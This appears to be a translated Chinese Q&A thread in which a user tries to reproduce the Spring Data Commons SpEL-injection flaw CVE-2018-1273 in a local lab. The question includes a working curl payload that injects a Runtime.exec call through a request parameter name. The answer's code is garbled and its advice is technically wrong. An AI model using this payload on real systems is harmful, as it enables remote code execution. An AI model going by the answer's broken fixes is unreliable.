我正在尝试在无法执行的本地模拟Spring RCE漏洞。
代码:
https://github.com/wearearima/poc-cve-2018-1273
我正在使用的行家是
pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>eu.arima</groupId>
<artifactId>poc-cve-2018-1273</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>
<name>poc-cve-2018-1273</name>
<description>POC CVE 2018 1273</description>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.4.2.RELEASE</version>
<relativePath /> <!-- lookup parent from repository -->
</parent>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
这里有一个区别。我使用spring-boot-starter-data-rest而不是spring-boot-starter-data-jpa,因为它们都包含易受攻击的库,即spring-data-commons。
当我调用控制器类时,它无需执行提供的RCE代码即可正常工作。
控制器
@RestController
public class VulnerableController {
private static final Logger LOGGER = LoggerFactory.getLogger(VulnerableController.class);
@PostMapping(path = "/account")
public void doSomething(Account account) {
LOGGER.info("Account {} received", account.getName());
}
interface Account {
String getName();
}
}
调用API:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
为什么不执行代码?
答案 0 :(得分:1)
1-您应通过从任意一个依赖项中排除 常见 依赖项来删除不必要的依赖项 示例:-
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
<exclusions>
<exclusion> <!-- declare the exclusion here -->
<groupId>org.springframework.boot</groupId>
<artifactId>spring-data-commons</artifactId>
</exclusion>
</exclusions>
</dependency>
2-进行测试以查看命令的返回值:
public static void main(String[] args)
{
Account.getClass().getRuntime().exec('calc.exe');
}
3-将您的控制器代码更改为以下
@RestController
public class VulnerableController {
private static final Logger LOGGER = LoggerFactory.getLogger(VulnerableController.class);
@PostMapping(path = "/account")
public void doSomething(@RequestBody Account account) {
LOGGER.info("Account {} received", account.getName());
}
interface Account {
String getName();
}
}
4-从cmd执行以下命令
curl --header "Content-Type: application/json" \
--request POST \
--data '{your account class as json format}' \
http://localhost:8080/account